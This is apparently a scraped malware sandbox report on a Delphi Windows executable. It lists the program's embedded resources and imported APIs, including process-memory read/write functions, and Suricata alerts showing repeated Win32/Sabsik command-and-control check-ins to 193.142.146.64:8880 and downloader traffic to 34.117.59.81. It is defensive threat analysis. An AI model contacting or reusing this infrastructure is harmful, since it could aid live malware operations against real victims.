                                  PNG0x1cb9840xe8PNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9956896551724138
                                  PNG0x1cba6c0x109PNG image data, 22 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1cbb780xcePNG image data, 9 x 8, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1cbc480xcaPNG image data, 11 x 10, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9851485148514851
                                  PNG0x1cbd140xf6PNG image data, 13 x 12, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9959349593495935
                                  PNG0x1cbe0c0xeePNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9957983193277311
                                  PNG0x1cbefc0xbf71PNG image data, 22 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7202146544512232
                                  PNG0x1d7e700x12dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0066445182724253
                                  PNG0x1d7fa00x13aPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0095541401273886
                                  PNG0x1d80dc0x161PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0113314447592068
                                  PNG0x1d82400x18aPNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0203045685279188
                                  PNG0x1d83cc0x1caPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0240174672489082
                                  PNG0x1d85980xffPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1d86980x11bPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0035335689045937
                                  PNG0x1d87b40x135PNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0161812297734627
                                  PNG0x1d88ec0x160PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0113636363636365
                                  PNG0x1d8a4c0x18cPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0176767676767677
                                  PNG0x1d8bd80x4f5PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0086682427107958
                                  PNG0x1d90d00x2b8PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0158045977011494
                                  PNG0x1d93880x42bPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0103092783505154
                                  PNG0x1d97b40x3d7PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0111902339776195
                                  PNG0x1d9b8c0xf6PNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0040650406504066
                                  PNG0x1d9c840xcdPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0
                                  PNG0x1d9d540x10cPNG image data, 40 x 32, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0223880597014925
                                  PNG0x1d9e600x240PNG image data, 50 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0190972222222223
                                  PNG0x1da0a00x27dPNG image data, 26 x 21, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0172684458398744
                                  PNG0x1da3200x39cPNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0119047619047619
                                  PNG0x1da6bc0x717PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8429752066115702
                                  PNG0x1dadd40x7e5PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8629391390400791
                                  PNG0x1db5bc0x937PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8817295464179737
                                  PNG0x1dbef40xa5ePNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8862094951017332
                                  PNG0x1dc9540x4a5PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0092514718250631
                                  PNG0x1dcdfc0x7f5PNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8689248895434463
                                  PNG0x1dd5f40x8f0PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8837412587412588
                                  PNG0x1ddee40xabfPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9051254089422028
                                  PNG0x1de9a40xcb7PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9182795698924732
                                  PNG0x1df65c0x438PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.010185185185185
                                  PNG0x1dfa940x7afPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8566344687341129
                                  PNG0x1e02440x87fPNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8726436781609196
                                  PNG0x1e0ac40xa53PNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8974650018917897
                                  PNG0x1e15180xc5fPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9153773287022419
                                  PNG0x1e21780x796PNG image data, 40 x 40, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.005664263645726
                                  PNG0x1e29100xbeePNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9119187950229207
                                  PNG0x1e35000xda8PNG image data, 60 x 60, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9236270022883295
                                  PNG0x1e42a80x114bPNG image data, 80 x 80, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9405918229049017
                                  PNG0x1e53f40x14d6PNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9514435695538058
                                  PNG0x1e68cc0x7faPNG image data, 50 x 50, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8653281096963761
                                  PNG0x1e70c80x8e2PNG image data, 62 x 62, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8768689533861038
                                  PNG0x1e79ac0xa08PNG image data, 75 x 75, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.8921339563862928
                                  PNG0x1e83b40xc4fPNG image data, 100 x 100, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9139955569660425
                                  PNG0x1e90040xf37PNG image data, 125 x 125, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9324775353016688
                                  PNG0x1e9f3c0x325PNG image data, 32 x 16, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.013664596273292
                                  PNG0x1ea2640x472PNG image data, 42 x 21, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0096660808435853
                                  PNG0x1ea6d80x55fPNG image data, 52 x 26, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.008
                                  PNG0x1eac380x6aePNG image data, 63 x 31, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0064327485380118
                                  PNG0x1eb2e80x8f3PNG image data, 84 x 42, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0048013967699694
                                  PNG0x1ebbdc0x9baPNG image data, 37 x 47, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.004417670682731
                                  PNG0x1ec5980x34dPNG image data, 126 x 14, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.01301775147929
                                  PNG0x1ec8e80xa99PNG image data, 157 x 17, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0040545521562845
                                  PNG0x1ed3840xc30PNG image data, 189 x 21, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.003525641025641
                                  PNG0x1edfb40xe60PNG image data, 252 x 28, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0029891304347827
                                  PNG0x1eee140x1506PNG image data, 315 x 35, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0020438498699369
                                  PNG0x1f031c0xbbePNG image data, 37 x 47, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.0036593479707252
                                  RT_BITMAP0x1f0edc0x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.41392649903288203
                                  RT_BITMAP0x1f1f040x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.2161654135338346
                                  RT_BITMAP0x1f232c0x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5018796992481203
                                  RT_BITMAP0x1f27540x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.3167293233082707
                                  RT_BITMAP0x1f2b7c0x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.5548839458413927
                                  RT_BITMAP0x1f3ba40x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5582706766917294
                                  RT_BITMAP0x1f3fcc0x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.48402255639097747
                                  RT_BITMAP0x1f43f40x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.5469924812030075
                                  RT_BITMAP0x1f481c0x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.4906015037593985
                                  RT_BITMAP0x1f4c440x1028Device independent bitmap graphic, 32 x 32 x 32, image size 40960.3034332688588008
                                  RT_BITMAP0x1f5c6c0x428Device independent bitmap graphic, 16 x 16 x 32, image size 10240.48872180451127817
                                  RT_BITMAP0x1f60940x6804Device independent bitmap graphic, 391 x 17 x 32, image size 26588, resolution 3582 x 3582 px/mEnglishGreat Britain0.2400105152471083
                                  RT_BITMAP0x1fc8980x5c28Device independent bitmap graphic, 368 x 16 x 32, image size 23552, resolution 3700 x 3700 px/mEnglishGreat Britain0.2527975584944049
                                  RT_BITMAP0x2024c00x8fe8Device independent bitmap graphic, 460 x 20 x 32, image size 36800, resolution 3503 x 3503 px/mEnglishGreat Britain0.2719326818675353
                                  RT_BITMAP0x20b4a80xcf28Device independent bitmap graphic, 552 x 24 x 32, image size 52992, resolution 3543 x 3543 px/mEnglishGreat Britain0.23167144365666012
                                  RT_BITMAP0x2183d00x17028Device independent bitmap graphic, 736 x 32 x 32, image size 94208, resolution 3543 x 3543 px/mEnglishGreat Britain0.1775528393175452
                                  RT_BITMAP0x22f3f80x23f28Device independent bitmap graphic, 920 x 40 x 32, image size 147200, resolution 3503 x 3503 px/mEnglishGreat Britain0.14206058136375985
                                  RT_BITMAP0x2533200x9ea4Device independent bitmap graphic, 483 x 21 x 32, image size 40572, resolution 3582 x 3582 px/mEnglishGreat Britain0.2606618733379297
                                  RT_BITMAP0x25d1c40xe0c4Device independent bitmap graphic, 575 x 25 x 32, image size 57500, resolution 3503 x 3503 px/mEnglishGreat Britain0.21746611053180395
                                  RT_BITMAP0x26b2880x19f98Device independent bitmap graphic, 782 x 34 x 32, image size 106352, resolution 3543 x 3543 px/mEnglishGreat Britain0.16091435446274155
                                  RT_BITMAP0x2852200x27a18Device independent bitmap graphic, 966 x 42 x 32, image size 162288, resolution 3582 x 3582 px/mEnglishGreat Britain0.13048272633187127
                                  RT_BITMAP0x2acc380x2028Device independent bitmap graphic, 128 x 16 x 32, image size 8192, resolution 3700 x 3700 px/mEnglishGreat Britain0.04652575315840622
                                  RT_BITMAP0x2aec600x3228Device independent bitmap graphic, 160 x 20 x 32, image size 12800, resolution 3700 x 3700 px/mEnglishGreat Britain0.07842679127725857
                                  RT_BITMAP0x2b1e880x4828Device independent bitmap graphic, 192 x 24 x 32, image size 18432, resolution 3661 x 3661 px/mEnglishGreat Britain0.056463837158943264
                                  RT_BITMAP0x2b66b00x8028Device independent bitmap graphic, 256 x 32 x 32, image size 32768, resolution 3661 x 3661 px/mEnglishGreat Britain0.0326749573274811
                                  RT_BITMAP0x2be6d80xc828Device independent bitmap graphic, 320 x 40 x 32, image size 51200, resolution 3661 x 3661 px/mEnglishGreat Britain0.03266978922716628
                                  RT_BITMAP0x2caf000xab8Device independent bitmap graphic, 52 x 13 x 32, image size 2704, resolution 2795 x 2795 px/mEnglishGreat Britain0.1271865889212828
                                  RT_BITMAP0x2cb9b80x1028Device independent bitmap graphic, 64 x 16 x 32, image size 4096, resolution 3622 x 3622 px/mEnglishGreat Britain0.1071083172147002
                                  RT_BITMAP0x2cc9e00x16b8Device independent bitmap graphic, 76 x 19 x 32, image size 5776, resolution 3622 x 3622 px/mEnglishGreat Britain0.10333562585969738
                                  RT_BITMAP0x2ce0980x2a68Device independent bitmap graphic, 104 x 26 x 32, image size 10816, resolution 3661 x 3661 px/mEnglishGreat Britain0.05407148120854827
                                  RT_BITMAP0x2d0b000x4028Device independent bitmap graphic, 128 x 32 x 32, image size 16384, resolution 3661 x 3661 px/mEnglishGreat Britain0.0479176814417925
                                  RT_BITMAP0x2d4b280x2028Device independent bitmap graphic, 16 x 128 x 32, image size 8192, resolution 2834 x 2834 px/mEnglishGreat Britain0.22983479105928087
                                  RT_BITMAP0x2d6b500x1028Device independent bitmap graphic, 32 x 32 x 32, image size 4096, resolution 3780 x 3780 px/mEnglishCanada0.30947775628626695
                                  RT_ICON0x2d7b780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.32692535194605465
                                  RT_MENU0x2e83a00x5edataEnglishGreat Britain0.8617021276595744
                                  RT_MENU0x2e84000x13cdataEnglishGreat Britain0.49683544303797467
                                  RT_MENU0x2e853c0x8edataEnglishGreat Britain0.6971830985915493
                                  RT_MENU0x2e85cc0x1aadataEnglishGreat Britain0.42018779342723006
                                  RT_MENU0x2e87780xdadataEnglishGreat Britain0.6238532110091743
                                  RT_MENU0x2e88540x164dataEnglishGreat Britain0.547752808988764
                                  RT_MENU0x2e89b80xbedataEnglishGreat Britain0.6368421052631579
                                  RT_MENU0x2e8a780xaedataEnglishGreat Britain0.632183908045977
                                  RT_MENU0x2e8b280xb8dataEnglishGreat Britain0.657608695652174
                                  RT_DIALOG0x2e8be00x530dataEnglishGreat Britain0.42846385542168675
                                  RT_DIALOG0x2e91100x238dataEnglishGreat Britain0.4982394366197183
                                  RT_DIALOG0x2e93480xe8dataEnglishGreat Britain0.6508620689655172
                                  RT_DIALOG0x2e94300x1c8dataEnglishGreat Britain0.5657894736842105
                                  RT_DIALOG0x2e95f80x1e0dataEnglishGreat Britain0.49166666666666664
                                  RT_DIALOG0x2e97d80x1acdataEnglishGreat Britain0.5607476635514018
                                  RT_DIALOG0x2e99840x1ccdataEnglishGreat Britain0.5
                                  RT_DIALOG0x2e9b500x1e4dataEnglishGreat Britain0.5206611570247934
                                  RT_DIALOG0x2e9d340x33cdataEnglishGreat Britain0.358695652173913
                                  RT_DIALOG0x2ea0700x6b6dataEnglishGreat Britain0.3911525029103609
                                  RT_DIALOG0x2ea7280x1a4dataEnglishGreat Britain0.5166666666666667
                                  RT_DIALOG0x2ea8cc0x1cedataEnglishGreat Britain0.48268398268398266
                                  RT_DIALOG0x2eaa9c0x4e4dataEnglishGreat Britain0.40814696485623003
                                  RT_DIALOG0x2eaf800x57edataEnglishGreat Britain0.4139402560455192
                                  RT_DIALOG0x2eb5000x54dataEnglishGreat Britain0.8095238095238095
                                  RT_DIALOG0x2eb5540xe0dataEnglishGreat Britain0.6517857142857143
                                  RT_DIALOG0x2eb6340x29adataEnglishGreat Britain0.47297297297297297
                                  RT_DIALOG0x2eb8d00xdcdataEnglishGreat Britain0.6363636363636364
                                  RT_DIALOG0x2eb9ac0x70dataEnglishGreat Britain0.7857142857142857
                                  RT_DIALOG0x2eba1c0x1cedataEnglishGreat Britain0.48484848484848486
                                  RT_DIALOG0x2ebbec0x180dataEnglishGreat Britain0.5755208333333334
                                  RT_DIALOG0x2ebd6c0x230dataEnglishGreat Britain0.4446428571428571
                                  RT_DIALOG0x2ebf9c0xc4dataEnglishGreat Britain0.7244897959183674
                                  RT_DIALOG0x2ec0600x14cdataEnglishGreat Britain0.5993975903614458
                                  RT_DIALOG0x2ec1ac0x462dataEnglishGreat Britain0.43137254901960786
                                  RT_DIALOG0x2ec6100x468dataEnglishGreat Britain0.43351063829787234
                                  RT_DIALOG0x2eca780x224dataEnglishGreat Britain0.5091240875912408
                                  RT_DIALOG0x2ecc9c0x286dataEnglishGreat Britain0.5046439628482973
                                  RT_DIALOG0x2ecf240x1e8dataEnglishGreat Britain0.5758196721311475
                                  RT_DIALOG0x2ed10c0xc8dBase III DBT, next free block index 4294901761EnglishGreat Britain0.665
                                  RT_DIALOG0x2ed1d40x938dataEnglishGreat Britain0.3771186440677966
                                  RT_DIALOG0x2edb0c0x462dataEnglishGreat Britain0.446524064171123
                                  RT_DIALOG0x2edf700x48adataEnglishGreat Britain0.3717728055077453
                                  RT_DIALOG0x2ee3fc0x34dataEnglishGreat Britain0.9038461538461539
                                  RT_DIALOG0x2ee4300x336dataEnglishGreat Britain0.38929440389294406
                                  RT_DIALOG0x2ee7680x462dataEnglishGreat Britain0.44563279857397503
                                  RT_DIALOG0x2eebcc0xd6dBase III DBT, next free block index 4294901761EnglishGreat Britain0.7009345794392523
                                  RT_DIALOG0x2eeca40x37cdataEnglishGreat Britain0.4461883408071749
                                  RT_DIALOG0x2ef0200xd4dataEnglishGreat Britain0.6037735849056604
                                  RT_DIALOG0x2ef0f40x2c8dataEnglishGreat Britain0.44662921348314605
                                  RT_DIALOG0x2ef3bc0x1a2dataEnglishGreat Britain0.5239234449760766
                                  RT_DIALOG0x2ef5600x186dataEnglishGreat Britain0.5948717948717949
                                  RT_DIALOG0x2ef6e80x3b4dataEnglishGreat Britain0.4588607594936709
                                  RT_DIALOG0x2efa9c0x38adataEnglishGreat Britain0.45916114790286977
                                  RT_DIALOG0x2efe280x3c8dataEnglishGreat Britain0.3894628099173554
                                  RT_DIALOG0x2f01f00x428dataEnglishGreat Britain0.36654135338345867
                                  RT_DIALOG0x2f06180x92dataEnglishGreat Britain0.6027397260273972
                                  RT_DIALOG0x2f06ac0x39cdataEnglishGreat Britain0.4090909090909091
                                  RT_DIALOG0x2f0a480x248dataEnglishGreat Britain0.488013698630137
                                  RT_DIALOG0x2f0c900x51cdataEnglishGreat Britain0.4258409785932722
                                  RT_DIALOG0x2f11ac0x558dataEnglishGreat Britain0.4159356725146199
                                  RT_DIALOG0x2f17040x4fedataEnglishGreat Britain0.4460093896713615
                                  RT_DIALOG0x2f1c040x544dataEnglishGreat Britain0.41839762611275966
                                  RT_DIALOG0x2f21480x454dataEnglishGreat Britain0.4575812274368231
                                  RT_DIALOG0x2f259c0x144dataEnglishGreat Britain0.6172839506172839
                                  RT_DIALOG0x2f26e00x514dataEnglishGreat Britain0.4276923076923077
                                  RT_DIALOG0x2f2bf40x248dataEnglishGreat Britain0.4674657534246575
                                  RT_DIALOG0x2f2e3c0x1dcdataEnglishGreat Britain0.5189075630252101
                                  RT_DIALOG0x2f30180xfcdataEnglishGreat Britain0.6746031746031746
                                  RT_DIALOG0x2f31140x40dataEnglishGreat Britain0.875
                                  RT_DIALOG0x2f31540x334dataEnglishGreat Britain0.44390243902439025
                                  RT_STRING0x2f34880x2b4data0.47398843930635837
                                  RT_STRING0x2f373c0xbe0data0.24243421052631578
                                  RT_RCDATA0x2f431c0x10data1.5
                                  RT_RCDATA0x2f432c0x3acdata0.7042553191489361
                                  RT_RCDATA0x2f46d80x140Delphi compiled form 'TFormMain'0.740625
                                  RT_RCDATA0x2f48180xb90Delphi compiled form 'TMadExcept'0.47297297297297297
                                  RT_RCDATA0x2f53a80x34eDelphi compiled form 'TMEContactForm'0.43498817966903075
                                  RT_RCDATA0x2f56f80x228Delphi compiled form 'TMEDetailsForm'0.5416666666666666
                                  RT_RCDATA0x2f59200x2a3Delphi compiled form 'TMEScrShotForm'0.5333333333333333
                                  RT_RCDATA0x2f5bc40x507Delphi compiled form 'TNoticForm'0.5003885003885004
                                  RT_RCDATA0x2f60cc0x2c634Delphi compiled form 'TScreenShotMainForm'0.26612654830264226
                                  RT_RCDATA0x3227000x20a2Delphi compiled form 'TTipForm'0.3003351687814221
                                  RT_GROUP_ICON0x3247a40x14dataChineseChina1.15
                                  RT_VERSION0x3247b80x30cdataEnglishUnited States0.4564102564102564
                                  RT_DLGINCLUDE0x324ac40x7b836PC bitmap, Windows 3.x format, 63720 x 2 x 43, image size 506370, cbSize 505910, bits offset 540.42614891976833824
                                  RT_ANIICON0x3a02fc0xc657PC bitmap, Windows 3.x format, 6558 x 2 x 36, image size 51339, cbSize 50775, bits offset 540.4406499261447563
                                  RT_ANIICON0x3ac9540x8ef0PC bitmap, Windows 3.x format, 5482 x 2 x 42, image size 37043, cbSize 36592, bits offset 540.39869370354175776
                                  RT_ANIICON0x3b58440xbf26PC bitmap, Windows 3.x format, 6505 x 2 x 54, image size 49665, cbSize 48934, bits offset 540.34722278988024685
                                  RT_ANIICON0x3c176c0x33400PC bitmap, Windows 3.x format, 26476 x 2 x 52, image size 210721, cbSize 209920, bits offset 540.4880573551829268
                                  RT_ANIICON0x3f4b6c0x2dedePC bitmap, Windows 3.x format, 23700 x 2 x 52, image size 188837, cbSize 188126, bits offset 540.4889754738845242
                                  RT_MANIFEST0x422a4c0x352XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.48

                                  Imports

                                  DLLImport
                                  gdi32.dllTextOutW, StretchDIBits, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixelV, SetPixel, SetDIBitsToDevice, SetDIBits, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, OffsetViewportOrgEx, MoveToEx, LineTo, IntersectClipRect, GetViewportOrgEx, GetTextMetricsW, GetTextExtentPoint32W, GetTextExtentExPointW, GetTextColor, GetTextAlign, GetStockObject, GetROP2, GetPixel, GetPaletteEntries, GetObjectType, GetObjectW, GetNearestPaletteIndex, GetDeviceCaps, GetDIBits, GetCurrentPositionEx, GetCurrentObject, GetClipBox, GetBkMode, GetBkColor, ExtTextOutW, ExcludeClipRect, Ellipse, DeleteObject, DeleteDC, CreateRoundRectRgn, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CombineRgn, BitBlt
                                  kernel32.dlllstrcmpW, WriteProcessMemory, WritePrivateProfileStringW, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, UnmapViewOfFile, TerminateProcess, SystemTimeToFileTime, Sleep, ReadProcessMemory, QueryDosDeviceW, OutputDebugStringW, OpenProcess, MulDiv, MapViewOfFile, LocalFree, LocalAlloc, LoadLibraryW, LeaveCriticalSection, IsBadCodePtr, InitializeCriticalSection, HeapFree, HeapDestroy, HeapAlloc, GlobalUnlock, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalGetAtomNameW, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetTickCount, GetTempPathW, GetSystemTime, GetSystemInfo, GetSystemDirectoryW, GetProcessTimes, GetProcAddress, GetPrivateProfileStringW, GetPriorityClass, GetModuleHandleW, GetModuleFileNameW, GetLogicalDriveStringsW, GetLastError, GetDriveTypeW, GetDiskFreeSpaceExW, GetCurrentThreadId, GetCurrentProcess, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FlushInstructionCache, FileTimeToSystemTime, EnterCriticalSection, CreateMutexW, CreateFileMappingW, CreateFileW, CopyFileW, CloseHandle
                                  advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegFlushKey, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, GetUserNameW, AdjustTokenPrivileges
                                  shell32.dllSHGetFileInfoW, ExtractIconW
                                  shell32.dllSHGetSpecialFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW
                                  ole32.dllCoCreateInstance
                                  comctl32.dll_TrackMouseEvent, ImageList_GetIconSize, ImageList_Draw
                                  Kernel32.dllGetLongPathNameW
                                  kernel32.dllSleep
                                  ole32.dllIsEqualGUID
                                  comctl32.dllImageList_GetIconSize
                                  user32.dllPrivateExtractIconsW
                                  kernel32.dllVerSetConditionMask, VerifyVersionInfoW

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain
                                  EnglishCanada
                                  ChineseChina
                                  EnglishUnited States

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-05T16:46:40.239620+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.749803193.142.146.648880TCP
                                  2024-10-05T16:46:42.481091+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.749815193.142.146.648880TCP
                                  2024-10-05T16:46:45.158427+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74983334.117.59.8180TCP
                                  2024-10-05T16:46:45.163501+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.749832193.142.146.648880TCP
                                  2024-10-05T16:46:47.803365+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.749849193.142.146.648880TCP
                                  2024-10-05T16:46:50.585727+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.749861193.142.146.648880TCP
                                  2024-10-05T16:46:53.572280+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750328193.142.146.648880TCP
                                  2024-10-05T16:46:56.384698+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750342193.142.146.648880TCP
                                  2024-10-05T16:46:58.687896+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750363193.142.146.648880TCP
                                  2024-10-05T16:47:01.498487+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750380193.142.146.648880TCP
                                  2024-10-05T16:47:04.168605+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750397193.142.146.648880TCP
                                  2024-10-05T16:47:06.815409+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750414193.142.146.648880TCP
                                  2024-10-05T16:47:09.479387+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750431193.142.146.648880TCP
                                  2024-10-05T16:47:09.528082+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75043234.117.59.8180TCP
                                  2024-10-05T16:47:13.121801+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750444193.142.146.648880TCP
                                  2024-10-05T16:47:15.770445+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750449193.142.146.648880TCP
                                  2024-10-05T16:47:15.809463+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75045034.117.59.8180TCP
                                  2024-10-05T16:47:18.441887+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750451193.142.146.648880TCP
                                  2024-10-05T16:47:21.431202+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750453193.142.146.648880TCP
                                  2024-10-05T16:47:21.481284+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75045434.117.59.8180TCP
                                  2024-10-05T16:47:24.141651+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750455193.142.146.648880TCP
                                  2024-10-05T16:47:26.780755+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750457193.142.146.648880TCP
                                  2024-10-05T16:47:30.387265+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750459193.142.146.648880TCP
                                  2024-10-05T16:47:33.183372+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750461193.142.146.648880TCP
                                  2024-10-05T16:47:35.647615+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750463193.142.146.648880TCP
                                  2024-10-05T16:47:38.300123+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750465193.142.146.648880TCP
                                  2024-10-05T16:47:40.935510+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750467193.142.146.648880TCP
                                  2024-10-05T16:47:43.576008+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750469193.142.146.648880TCP
                                  2024-10-05T16:47:46.208206+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750471193.142.146.648880TCP
                                  2024-10-05T16:47:48.926986+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.75047434.117.59.8180TCP
                                  2024-10-05T16:47:48.934070+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750473193.142.146.648880TCP
                                  2024-10-05T16:47:51.581575+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750475193.142.146.648880TCP
                                  2024-10-05T16:47:54.225238+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750477193.142.146.648880TCP
                                  2024-10-05T16:47:57.019805+02002037836ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin1192.168.2.750479193.142.146.648880TCP
